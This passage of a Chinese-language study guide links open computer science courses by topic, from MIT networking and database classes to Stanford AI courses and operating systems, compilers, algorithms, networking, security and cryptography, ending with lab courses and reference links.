ๅ…จ็ƒ็ฝ‘็ปœๅŸบ็ก€่ฎพๆ–ฝๅฆ‚ไฝ•ๅทฅไฝœ๏ผŒๅ…ถๅŸบ็ก€ๆ˜ฏไป€ไนˆ่ฎพ่ฎกๅŽŸๅˆ™๏ผŸๅœจๅฎž่ทตไธญ๏ผŒ่ฟ™ไบ›่ฎพ่ฎกๅŽŸๅˆ™ๅœจๅ“ชไบ›ๆ–น้ขๅ—ๅˆฐไบ†ๆŸๅฎณ๏ผŸๆˆ‘ไปฌๅฆ‚ไฝ•ไฝฟๅฎƒๅœจๅฝ“ไปŠไธ–็•Œๆ›ดๅฅฝๅœฐๅทฅไฝœ๏ผŸ้ขๅฏนๅฟซ้€Ÿๅขž้•ฟ็š„่ง„ๆจกๅ’Œๅผ‚่ดจๆ€ง๏ผŒๆˆ‘ไปฌๅฆ‚ไฝ•็กฎไฟๅฎƒๅœจๆœชๆฅ่ฟไฝœ่‰ฏๅฅฝ๏ผŸๅบ”่ฏฅๅฆ‚ไฝ•็ผ–ๅ†™ Internet ๅบ”็”จ็จ‹ๅบ๏ผŒไปฅไพฟๅฎƒไปฌ่ƒฝๅคŸไธบ่‡ชๅทฑๅ’Œไฝฟ็”จๅŸบ็ก€็ป“ๆž„็š„ๅ…ถไป–ไบบ่Žทๅพ—ๆœ€ไฝณๆ€ง่ƒฝ๏ผŸ่ฟ™ไบ›ๆ˜ฏๆœฌ่ฏพ็จ‹ไธญๆญฃๅœจๅค„็†็š„ไธ€ไบ›้—ฎ้ข˜ใ€‚ๆœฌ่ฏพ็จ‹ๅฐ†ไพง้‡ไบŽๅคงๅž‹่”็ฝ‘็ณป็ปŸ็š„่ฎพ่ฎกใ€ๅฎžๆ–ฝใ€ๅˆ†ๆžๅ’Œ่ฏ„ไผฐใ€‚ ๅœฐๅ€๏ผš[https://web.mit.edu/6.829/www/currentsemester/](https://link.zhihu.com/?target=https%3A//web.mit.edu/6.829/www/currentsemester/) - **6.830/6.814: Database Systems** ๆœฌ่ฏพ็จ‹ไพๆ‰˜ๆ•ฐๆฎๅบ“็คพๅŒบ็š„ไธป่ฆ้˜…่ฏป่ต„ๆ–™๏ผŒๅ‘็ ”็ฉถ็”Ÿไป‹็ปๆ•ฐๆฎๅบ“็ณป็ปŸ็š„ๅŸบ็ก€๏ผŒ้‡็‚นไป‹็ปๅ…ณ็ณปไปฃๆ•ฐๅ’Œๆ•ฐๆฎๆจกๅž‹ใ€ๆžถๆž„่ง„่ŒƒๅŒ–ใ€ๆŸฅ่ฏขไผ˜ๅŒ–ๅ’Œไบ‹ๅŠกใ€‚ ๅœฐๅ€๏ผš[http://db.csail.mit.edu/6.830/index.phpdb.csail.mit.edu/6.830/index.php](https://link.zhihu.com/?target=http%3A//db.csail.mit.edu/6.830/index.php) ## ไบบๅทฅๆ™บ่ƒฝ&AI - [ๅดๆฉ่พพๆœบๅ™จๅญฆไน ](https://www.coursera.org/learn/machine-learning) - [CS224d: Deep Learning for Natural Language Processing](http://cs224d.stanford.edu/syllabus.html) - [CS221: Artificial Intelligence: Principles and Techniques](http://web.stanford.edu/class/cs221/) - [CS 20: Tensorflow for Deep Learning Research](https://web.stanford.edu/class/cs20si/syllabus.html) - [CS234: Reinforcement Learning](http://web.stanford.edu/class/cs234/schedule.html) - Amazon ๆŽๆฒๅคง็ฅžๅ‡บ็š„[ใ€ŠๅŠจๆ‰‹ๅญฆๆทฑๅบฆๅญฆไน ใ€‹](https://discuss.gluon.ai/t/topic/753) - ๅฐๆนพๅคงๅญฆๆž—่ฝฉ็”ฐๆ•™ๆŽˆ [ใ€Šๆœบๅ™จๅญฆไน ๅŸบ็ŸณไธŠใ€‹](https://www.coursera.org/learn/ntumlone-mathematicalfoundations)๏ผŒ [ใ€Šๆœบๅ™จๅญฆไน ๅŸบ็Ÿณไธ‹ใ€‹](https://www.coursera.org/learn/ntumlone-algorithmicfoundations) - ๅฐๆนพๅคงๅญฆ[ใ€ŠApplied Deep Learning/Machine Learning and Having It Deep and Structuredใ€‹](https://www.csie.ntu.edu.tw/~yvchen/f106-adl/syllabus.html) - [UCB CS188](https://www.bilibili.com/video/av15630620/) - [MIT 6.034](http://open.163.com/movie/2017/9/Q/S/MCTMNN3UI_MCTMNR8QS.html) - ๆ–ฏๅฆ็ฆ CS229 [่ง†้ข‘](http://open.163.com/special/opencourse/machinelearning.html) [่ฎฒไน‰](https://github.com/Kivy-CN/Stanford-CS-229-CN) - ๆ–ฏๅฆ็ฆ CS231n [่ง†้ข‘](https://www.bilibili.com/video/av17204303/) [่ฎฒไน‰](https://zhuanlan.zhihu.com/p/21930884?refer=intelligentunit) - ๆ–ฏๅฆ็ฆ CS224d [ไธป้กต](http://cs224d.stanford.edu/) [่ฎฒไน‰](http://blog.csdn.net/column/details/dl-nlp.html) - [ๆ–ฏๅฆ็ฆ CS20si](https://web.stanford.edu/class/cs20si/) - ๆ–ฏๅฆ็ฆ CS230 / DeepLearningAI [่ง†้ข‘](https://mooc.study.163.com/course/deeplearning_ai-2001281002#/info) [็ฌ”่ฎฐ](http://ai-start.com/dl2017/) - [MIT 6.S191](https://www.bilibili.com/video/av19113488) - UCB CS294 [่ง†้ข‘](https://www.bilibili.com/video/av9802698/) [็ฌ”่ฎฐ](https://zhuanlan.zhihu.com/c_150977189) ## ๆ“ไฝœ็ณป็ปŸ - [MIT ๅคงๅ้ผŽ้ผŽ็š„6.828](<https://pdos.csail.mit.edu/6.828/2018/schedule.html>) - [ๆธ…ๅŽๅคงๅญฆ็š„OS่ฏพ็จ‹ ucore,่ง†้ข‘ๅœจๅญฆๅ ‚ๅœจ็บฟๅ’Œbilibiliๅ‡ๆœ‰](<http://os.cs.tsinghua.edu.cn/oscourse/OS2017spring#A.2Bi.2F56C4nGmJE->) - [rust ็‰ˆๆœฌucore rcore](https://rcore-os.github.io/rCore_tutorial_doc/) - [ๅ—ไบฌๅคงๅญฆ ICS PA](https://nju-projectn.github.io/ics-pa-gitbook/ics2019/) - NJU ICS PA [Bilibili้“พๆŽฅ](https://www.bilibili.com/video/BV1qa4y1j7xk) - [NJU OS](https://www.bilibili.com/video/BV1HN41197Ko?p=1) - ไธŠๆตทไบค้€šๅคงๅญฆ ๆ“ไฝœ็ณป็ปŸ (้™ˆๆตทๆณขใ€ๅค่™žๆ–Œ) [BiliBili้“พๆŽฅ](https://www.bilibili.com/video/BV1B341117Ez?from=search&seid=711317104834272627&spm_id_from=333.337.0.0) - [ไธŠๆตทไบค้€šๅคงๅญฆ SE315](https://ipads.se.sjtu.edu.cn/courses/os/) [่ง†้ข‘่ฏพ็จ‹๏ผˆๅฅฝๅคงๅญฆๅœจ็บฟ๏ผ‰ ](https://www.cnmooc.org/portal/course/5610/14956.mooc) [ๆ•™ๆ ใ€Š็Žฐไปฃๆ“ไฝœ็ณป็ปŸโ€”โ€”ๅŽŸ็†ไธŽๅฎž็Žฐใ€‹](https://ipads.se.sjtu.edu.cn/mospi/) [้…ๅฅ— Lab](https://gitee.com/ipads-lab/chcore-lab) - [CMU CSAPP ๅฏนๅบ”็š„่ฏพ็จ‹ 15213](https://www.cs.cmu.edu/~213/schedule.html) - [CMU 15410/605](https://www.cs.cmu.edu/~410/) - [Gate Lectures OS](https://www.youtube.com/playlist?list=PLEbnTDJUr_If_BnzJkkN_J0Tl3iXTL8vq) ## ็จ‹ๅบ่ฏญ่จ€ - [Structure and Interpretation of Computer Programs](https://book.douban.com/subject/1451622/) - [CIS 194(ๅญฆไน haskell)](<https://www.seas.upenn.edu/~cis194/spring13/lectures.html>) - [ไผฏๅ…‹ๅˆฉๆ”น็š„Python็‰ˆSICP](<https://cs61a.org/>) - [ๅŽ็››้กฟๅคงๅญฆ Programming Languages](<https://www.coursera.org/lecture/programming-languages/welcome-and-some-course-mechanics-3dedE>) - [ๆต“็ผฉ็‰ˆmit 6.001(SICP)](http://web.mit.edu/alexmv/6.037/) ## ็ผ–่ฏ‘ๅ™จ - [stanford CS143](http://web.stanford.edu/class/cs143/) - [stanford CS243](https://suif.stanford.edu/~courses/cs243/) - [stanford CS343](http://web.stanford.edu/class/cs343/) - [Gate Lectures ็ผ–่ฏ‘](https://www.youtube.com/playlist?list=PLEbnTDJUr_IcPtUXFy2b1sGRPsLFMghhS) ## ๆ•ฐๆฎๅบ“็ณป็ปŸ - [CMU 15445](https://15445.courses.cs.cmu.edu/fall2019/#) - [CMU 15721](https://15721.courses.cs.cmu.edu/spring2019/) - [MIT 6.830/6.814](<http://db.lcs.mit.edu/6.830/sched.php>) - [pingcap talent-plan](https://zhuanlan.zhihu.com/p/61340679) - [instruction](https://docs.google.com/document/d/1UG0OHuL6l_hHWs3oyT9gA2n7LuYUfV23nmz0tRvXq2k/edit#heading=h.ywlair765ic9) - [CS 245](http://web.stanford.edu/class/cs245/#schedule) - [ๆ–ฏๅฆ็ฆ CS346](https://web.stanford.edu/class/cs346/2015/) - [ไผฏๅ…‹ๅˆฉ CS 186](https://cs186berkeley.net/) - [ๆ–ฏๅฆ็ฆ CS145](https://www.bilibili.com/video/av19616961/) - [ๅŽ็››้กฟๅคงๅญฆ CSE444](https://courses.cs.washington.edu/courses/cse444/15sp/) ## ๅˆ†ๅธƒๅผ็ณป็ปŸ - **ๆ•ฐๆฎ็ป“ๆž„** by ้‚“ๅ…ฌ from ๆธ…ๅŽ๏ผš[MOOC](https://link.zhihu.com/?target=http%3A//www.xuetangx.com/courses/course-v1%3ATsinghuaX%2B30240184%2Bsp/about) - [MIT 6.824](https://pdos.csail.mit.edu/6.824/) - [Stanford CS244b: Distributed systems](https://www.scs.stanford.edu/14au-cs244b/) - [CMU 15-440/640, Spring 2016: Distributed Systems](https://www.cs.cmu.edu/~15-440/) ## ๆ•ฐๆฎ็ป“ๆž„ไธŽ็ฎ—ๆณ• - [UCB CS61b](https://inst.eecs.berkeley.edu/~cs61b/) - [ๆ™ฎๆž—ๆ–ฏ้กฟ Algs4](http://algs4.cs.princeton.edu/) - [MIT 6.006](http://open.163.com/special/opencourse/algorithms.html) - [Gate Lectures ็ฎ—ๆณ•ๅ’Œๆ•ฐๆฎ็ป“ๆž„](https://www.youtube.com/playlist?list=PLEbnTDJUr_IeHYw_sfBOJ6gk5pie0yP-0) - [ใ€Š็ฎ—ๆณ• ็ฌฌๅ››็‰ˆใ€‹](https://algs4.cs.princeton.edu/home/) - ๆ™ฎๆž—ๆ–ฏ้กฟๅœจ [Coursera](https://www.coursera.org/) ไธŠไนŸๅ…ฌๅผ€ไบ†ไธค้—จๅฏนๅบ”่ฏพ็จ‹๏ผš[Algorithms, Part I](https://www.coursera.org/learn/algorithms-part1) ๅ’Œ [Algorightmsm, Part2](https://www.coursera.org/learn/algorithms-part2) - [ๆ–ฏๅฆ็ฆ CS106b](http://open.163.com/special/opencourse/abstractions.html) (broken link) ## ่ฎก็ฎ—ๆœบ็ฝ‘็ปœ - **่ฎก็ฎ—ๆœบ็ง‘ๅญฆ** ๅ“ˆไฝ›๏ผš [B็ซ™](https://link.zhihu.com/?target=https%3A//www.bilibili.com/video/av310513%3Ffrom%3Dsearch%26seid%3D4682685095165261117) - [CMU-15441](https://computer-networks.github.io/sp19/) - [cs144](https://cs144.github.io/) - [top to down approach](http://uniteng.com/wiki/doku.php?id=classlog:computer_networks) - [myk's top-to-down](https://github.com/moranzcw/Computer-Networking-A-Top-Down-Approach-NOTES) - [ไผฏๅ…‹ๅˆฉ EE122](https://www2.eecs.berkeley.edu/Courses/EE122/) - [Gate Lectures ่ฎก็ฝ‘](https://www.youtube.com/playlist?list=PLEbnTDJUr_IegfoqO4iPnPYQui46QqT0j) - [ๆ–ฏๅฆ็ฆ CS144](https://www.bilibili.com/video/av11930774/) - ้บป็œ็†ๅทฅMIT ่ฎก็ฎ—ๆœบๅฎ‰ๅ…จไธŽ็ฝ‘็ปœๅฎ‰ๅ…จ [ๅ›ฝๅ†…B็ซ™้“พๆŽฅ](https://www.bilibili.com/video/BV1Bm4y1o7cx?spm_id_from=333.1007.top_right_bar_window_history.content.click) ## ่ฎก็ฎ—ๆœบ็ณป็ปŸ่ฎพ่ฎก - [nand2tetris](http://www.nand2tetris.org/) - CMU 15-213 [่ง†้ข‘](https://www.bilibili.com/video/BV1iW411d7hd) [่ฎฒไน‰](https://hansimov.gitbook.io/csapp/) - MIT 6.828 [ๅฎ˜็ฝ‘ไธป้กต](https://pdos.csail.mit.edu/6.828/) [xv6ไธญๆ–‡ๆ–‡ๆกฃ](https://th0ar.gitbooks.io/xv6-chinese/content/content/cover.html) - [UCB CS61c](http://www-inst.eecs.berkeley.edu/~cs61c/) ## ็ ”็ฉถ็”Ÿ่ฏพ็จ‹ - **6.254 ๆธธๆˆ็†่ฎบ็š„ๅทฅ็จ‹ๅบ”็”จ** ่ฏพ็จ‹ๅœฐๅ€๏ผš [Game Theory with Engineering Applications (Spring 2010)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-254-game-theory-with-engineering-applications-spring-2010) - **6.823 ่ฎก็ฎ—ๆœบ็ณป็ปŸๆžถๆž„** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Computer System Architecture (Fall 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-823-computer-system-architecture-fall-2005) - **6.824 ๅˆ†ๅธƒๅผ่ฎก็ฎ—ๆœบ็ณป็ปŸๅทฅ็จ‹** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Distributed Computer Systems Engineering (Spring 2006)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-824-distributed-computer-systems-engineering-spring-2006) ่ฟ™้—จ่ฏพ็š„่€ๅธˆไน‹ไธ€ๆ˜ฏRobert Morris๏ผŒไป–ๆ˜ฏ่ •่™ซ็š„ๅˆถ้€ ่€…๏ผŒๆ›พ่ขซ่ฏ„ไธบ5ๅคง้ป‘ๅฎขไน‹ไธ€ใ€‚ - **6.825 ไบบๅทฅๆ™บ่ƒฝๆŠ€ๆœฏ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Techniques in Artificial Intelligence (SMA 5504) (Fall 2002)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-825-techniques-in-artificial-intelligence-sma-5504-fall-2002) - **6.826 ่ฎก็ฎ—ๆœบ็ณป็ปŸ็†่ฎบ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Principles of Computer Systems (Spring 2002)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-826-principles-of-computer-systems-spring-2002) - **6.827 ๅคš็บฟ็จ‹ๅนถๅ‘๏ผš่ฏญ่จ€ไธŽ็ผ–่ฏ‘ๅ™จ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Multithreaded Parallelism: Languages and Compilers (Fall 2002)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-827-multithreaded-parallelism-languages-and-compilers-fall-2002) - **6.828: ๆ“ไฝœ็ณป็ปŸๅทฅ็จ‹** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Operating System Engineering(2018)](https://link.zhihu.com/?target=https%3A//pdos.csail.mit.edu/6.828/2018/schedule.html)ใ€[Operating System Engineering (Fall 2012)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-828-operating-system-engineering-fall-2012) ๅ‰็ฝฎ่ฏพ็จ‹ๆ˜ฏ [6.033 Computer System Engineering](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-033-computer-system-engineering-spring-2009)*ใ€*[6.170 Software Studio](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-170-software-studio-spring-2013)*ใ€*[6.004 Computation Structures](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-004-computation-structures-spring-2009) ่ฟ™้—จ่ฏพ็ ”็ฉถ็š„ๆ˜ฏๆ“ไฝœ็ณป็ปŸ็š„ๅŸบ็ก€่ฎพ่ฎกๅ’Œๅฎž็Žฐ๏ผŒๅŒ…ๆ‹ฌ่™šๆ‹Ÿๅ†…ๅญ˜ใ€็บฟ็จ‹ใ€ไธŠไธ‹ๆ–‡ๅˆ‡ๆขใ€ๅ†…ๆ ธใ€ไธญๆ–ญใ€็ณป็ปŸ่ฐƒ็”จใ€่ฟ›็จ‹้—ด้€šไฟกใ€ๅ่ฐƒๅ’Œ่ฝฏไปถๅ’Œ็กฌไปถไน‹้—ด็š„ไบคไบ’ใ€‚ - **6.829: ่ฎก็ฎ—ๆœบ็ฝ‘็ปœ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Computer Networks, Fall 2020](https://link.zhihu.com/?target=https%3A//web.mit.edu/6.829/www/currentsemester/)ใ€[Computer Networks (Fall 2002)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-829-computer-networks-fall-2002) - **6.830/6.814 ๆ•ฐๆฎๅบ“็ณป็ปŸ** โ˜…โ˜…โ˜…โ˜…โ˜… ่ฏพ็จ‹ๅœฐๅ€๏ผš[Database Systems (Spring 2021)](https://link.zhihu.com/?target=http%3A//dsg.csail.mit.edu/6.830/index.php)ใ€[Database Systems (Fall 2010)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-830-database-systems-fall-2010) - **6.831 ็”จๆˆทๆŽฅๅฃ่ฎพ่ฎกไธŽๅบ”็”จ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[User Interface Design and Implementation (Spring 2011)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-831-user-interface-design-and-implementation-spring-2011) - **6.838 ่ฎก็ฎ—ๆœบๅŠจ็”ป็š„็ฎ—ๆณ•** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Algorithms for Computer Animation (Fall 2002)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-838-algorithms-for-computer-animation-fall-2002) - **6.840J ่ฎก็ฎ—็†่ฎบ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Theory of Computation (Fall 2006)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/mathematics/18-404j-theory-of-computation-fall-2006) - **6.841J ่ฎก็ฎ—ๅคๆ‚ๆ€ง็†่ฎบ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Advanced Complexity Theory (Spring 2016)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/mathematics/18-405j-advanced-complexity-theory-spring-2016) - **6.844 ่ฎก็ฎ—ๅคๆ‚ๆ€ง็†่ฎบ๏ผˆScheme่ฏญ่จ€๏ผ‰** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Computability Theory of and with Scheme (Spring 2003)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-844-computability-theory-of-and-with-scheme-spring-2003) - **6.851 ้ซ˜็บงๆ•ฐๆฎ็ป“ๆž„** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Advanced Data Structures (Spring 2012)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-851-advanced-data-structures-spring-2012) - **6.852J ๅˆ†ๅธƒๅผ็ฎ—ๆณ•** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Distributed Algorithms (Fall 2009)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-852j-distributed-algorithms-fall-2009) - **6.854J ้ซ˜็บง็ฎ—ๆณ•** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Advanced Algorithms (Fall 2008)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-854j-advanced-algorithms-fall-2008)ใ€[Advanced Algorithms (Fall 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-854j-advanced-algorithms-fall-2005) - **6.855J ็ฝ‘็ปœไผ˜ๅŒ–** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Network Optimization (Fall 2010)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/sloan-school-of-management/15-082j-network-optimization-fall-2010) - **6.856J ้šๆœบ็ฎ—ๆณ•** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Randomized Algorithms (Fall 2002)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-856j-randomized-algorithms-fall-2002) - **6.857 ็ฝ‘็ปœไธŽ่ฎก็ฎ—ๆœบๅฎ‰ๅ…จ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Network and Computer Security (Spring 2014)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-857-network-and-computer-security-spring-2014) - **6.858 ่ฎก็ฎ—ๆœบ็ณป็ปŸๅฎ‰ๅ…จ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Computer Systems Security (Fall 2014)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-858-computer-systems-security-fall-2014) - **6.859J ๆ•ดๆ•ฐ่ง„ๅˆ’ไธŽ็ป„ๅˆไผ˜ๅŒ–** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Integer Programming and Combinatorial Optimization (Fall 2009)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/sloan-school-of-management/15-083j-integer-programming-and-combinatorial-optimization-fall-2009) - **6.863J ่‡ช็„ถ่ฏญ่จ€ไธŽ่ฎก็ฎ—ๆœบ่กจ็คบ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Natural Language and the Computer Representation of Knowledge (Spring 2003)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-863j-natural-language-and-the-computer-representation-of-knowledge-spring-2003) - **6.864 ้ซ˜็บง่‡ช็„ถ่ฏญ่จ€ๅค„็†** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Advanced Natural Language Processing (Fall 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-864-advanced-natural-language-processing-fall-2005) - **6.866 ๆœบๅ™จ่ง†่ง‰** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Machine Vision (Fall 2020)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-801-machine-vision-fall-2020) - **6.867 ๆœบๅ™จๅญฆไน ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Machine Learning (Fall 2006)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-867-machine-learning-fall-2006) - **6.871 ็Ÿฅ่ฏ†ๅž‹ๅบ”็”จ็ณป็ปŸ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Knowledge-Based Applications Systems (Spring 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-871-knowledge-based-applications-systems-spring-2005) - **6.875 ๅฏ†็ ๅญฆไธŽๅฏ†็ ๅˆ†ๆž** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Cryptography and Cryptanalysis (Spring 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-875-cryptography-and-cryptanalysis-spring-2005) - **6.876J ้ซ˜็บงๅฏ†็ ๅญฆ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Advanced Topics in Cryptography (Spring 2003)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-876j-advanced-topics-in-cryptography-spring-2003) - **6.881 ๅ›พๅƒ่กจ็คบไธŽๅˆ†ๆžๆ–นๆณ•** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Representation and Modeling for Image Analysis (Spring 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-881-representation-and-modeling-for-image-analysis-spring-2005) - **6.883 ๆ™ฎ้่ฎก็ฎ—ๆŠ€ๆœฏ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Pervasive Human Centric Computing (SMA 5508) (Spring 2006)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-883-pervasive-human-centric-computing-sma-5508-spring-2006) - **6.883 ็จ‹ๅบๅˆ†ๆž** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Program Analysis (Fall 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-883-program-analysis-fall-2005) - **6.890 ็ฎ—ๆณ•ๅคๆ‚ๅบฆๅˆ†ๆž** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Algorithmic Lower Bounds: Fun with Hardness Proofs (Fall 2014)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-890-algorithmic-lower-bounds-fun-with-hardness-proofs-fall-2014) - **6.892 ่ฏญ็ฏ‡ๅˆ†ๆž็š„่ฎก็ฎ—ๆœบๆจกๅž‹** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Computational Models of Discourse (Spring 2004)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-892-computational-models-of-discourse-spring-2004) - **6.895 ็ผ–็ ่ฆ็ด ็†่ฎบ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Essential Coding Theory (Fall 2004)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-895-essential-coding-theory-fall-2004) - **6.895 ๅนณ่กŒ็ณป็ปŸ็†่ฎบ** ่ฏพ็จ‹ๅœฐๅ€ [Theory of Parallel Systems (SMA 5509) (Fall 2003)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-895-theory-of-parallel-systems-sma-5509-fall-2003) - **6.896 ๅนณ่กŒ็กฌไปถ็†่ฎบ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Theory of Parallel Hardware (SMA 5511) (Spring 2004)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-896-theory-of-parallel-hardware-sma-5511-spring-2004) - **6.897ๅฏ†็ ๅญฆ่ฎบๆ–‡้€‰่ฏป** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Selected Topics in Cryptography (Spring 2004)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-897-selected-topics-in-cryptography-spring-2004) ## ๅฎž้ชŒ่ฏพ MIT้’ˆๅฏนไธๅŒ็š„็ผ–็จ‹่ฏญ่จ€้ƒฝๆœ‰้…ๅฅ—็š„ๅฎž้ชŒ่ฏพLab๏ผŒๅฆ‚C่ฏญ่จ€ใ€Javaใ€C++็ญ‰ - **6.087 C่ฏญ่จ€ๅฎžๆˆ˜** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Practical Programming in C (January IAP 2010)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-087-practical-programming-in-c-january-iap-2010) - **6.088 C่ฏญ่จ€ๅ†…ๅญ˜็ฎก็†ไธŽC++้ขๅ‘ๅฏน่ฑก** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Introduction to C Memory Management and C++ Object-Oriented Programming (January IAP 2010)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-088-introduction-to-c-memory-management-and-c-object-oriented-programming-january-iap-2010) - **6.090 ่ฝฏไปถๅผ€ๅ‘็ป้ชŒ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Building Programming Experience: A Lead-In to 6.001 (January IAP 2005)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-090-building-programming-experience-a-lead-in-to-6-001-january-iap-2005) - **6.092 Java็จ‹ๅบๅฏผ่ฎบ** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Introduction to Programming in Java (January IAP 2010)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-092-introduction-to-programming-in-java-january-iap-2010) ใ€[Java Preparation for 6.170 (January IAP 2006)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-092-java-preparation-for-6-170-january-iap-2006) - **6.096 C++็จ‹ๅบๅผ€ๅ‘** ่ฏพ็จ‹ๅœฐๅ€๏ผš[Introduction to C++ (January IAP 2011)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-096-introduction-to-c-january-iap-2011) - **6.370 ไบบๅทฅๆ™บ่ƒฝ็ซž่ต›** ่ฏพ็จ‹ๅœฐๅ€๏ผš[The Battlecode Programming Competition (January IAP 2013)](https://link.zhihu.com/?target=https%3A//ocw.mit.edu/courses/electrical-engineering-and-computer-science/6-370-the-battlecode-programming-competition-january-iap-2013) ## ๅทจไบบ็š„่‚ฉ่†€ https://zhuanlan.zhihu.com/p/112763953 https://www.zhihu.com/question/57532048 https://www.zhihu.com/question/29597104 https://www.zhihu.com/question/20571226/answer/1901441044 https://zhuanlan.zhihu.com/p/39030715
